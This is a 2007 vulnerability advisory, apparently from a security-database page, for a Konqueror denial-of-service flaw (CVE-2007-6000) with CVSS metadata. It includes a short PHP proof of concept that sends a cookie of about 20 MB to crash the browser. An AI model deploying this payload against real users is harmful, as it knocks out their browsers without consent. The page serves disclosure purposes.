Konqueror Remote Denial Of Service

2007.11.16

Credit: laurent gaffie

Risk: Medium

Local: Yes

Remote: No

CVE: CVE-2007-6000

CWE: CWE-399

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: None

Integrity impact: None

Availability impact: Partial

Application: Konqueror <= 3.5.6
Web Site: http://www.konqueror.org/
Platform: Unix
Bug: Remote Denial of service
-------------------------------------------------------
1) Introduction
2) Bug
3) Proof of concept
4) Greets
5) Credits
===========
1) Introduction
===========
"Konqueror is an Open Source web browser with HTML 4.01 compliance, supporting Java applets, JavaScript, CSS 1, CSS 2.1, as well as Netscape plugins (for example, Flash or RealVideo plugins)."
======
2) Bug
======
Konqueror doesn't handle big cookies, so when a big cookie is sended , konqueror will crash.
=====
3)Proof of concept
=====
Proof of concept example :
<?php
ini_set("memory_limit","200M");
setcookie("hi_fox", str_repeat("A",19999999));
?>
========
4)Greets
========
Berga,team soh, #futurezone, #soh
=====
5)Credits
=====
laurent gaffi

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Konqueror Remote Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.